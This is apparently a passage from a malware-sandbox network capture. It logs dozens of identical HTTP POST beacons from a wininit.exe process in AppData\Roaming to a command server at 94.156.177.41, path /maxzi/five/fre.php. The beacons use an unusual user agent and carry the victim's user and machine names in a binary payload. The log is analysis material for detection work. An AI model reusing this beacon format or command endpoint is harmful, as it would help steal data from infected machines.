Nov 20, 2024 10:12:10.647221088 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:10.655009031 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:11.403486013 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:11 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.22	49209	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:11.543548107 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:11.548573017 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:12.422246933 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:12 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.22	49210	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:12.578279018 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:12.583478928 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:13.483566999 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:13 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.22	49211	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:13.629894972 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:13.635351896 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:14.380477905 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:14 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.22	49212	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:14.663448095 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:14.668489933 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:15.543117046 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:15 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.22	49213	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:15.687622070 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:15.692785978 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:16.542809010 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:16 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.22	49214	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:16.703167915 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:16.709953070 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:17.576167107 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:17 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.22	49215	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:17.731513023 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:17.740345955 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:18.599451065 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:18 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.22	49216	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:19.470042944 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:19.475028992 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:20.249712944 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:20 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.22	49217	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:20.383630037 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:20.388739109 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:21.119462013 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:21 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.22	49218	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:21.260699034 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:21.265845060 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:22.167171955 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:22 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.22	49219	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:22.389425993 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:22.394588947 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:23.269963026 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:23 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.22	49220	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:23.414782047 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:23.419939041 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:24.148257971 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:24 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.22	49221	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:24.299547911 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:24.307414055 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:25.196887970 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:25 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.22	49222	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:25.348052025 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:25.356967926 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:26.119709969 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:26 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.22	49223	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:26.266532898 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:26.273859978 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:27.018465996 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:26 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.22	49224	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:27.156534910 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:27.165071964 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:27.971154928 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:27 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.22	49225	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:28.105493069 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:28.110543013 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:28.854964018 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:28 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.22	49226	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:28.993278980 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:28.999727964 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:29.827569008 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:29 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.22	49227	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:29.960427999 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:29.966425896 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:30.830818892 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:30 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.22	49228	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:30.977432966 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:30.982470036 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:31.861255884 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:31 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.22	49229	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:32.017537117 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
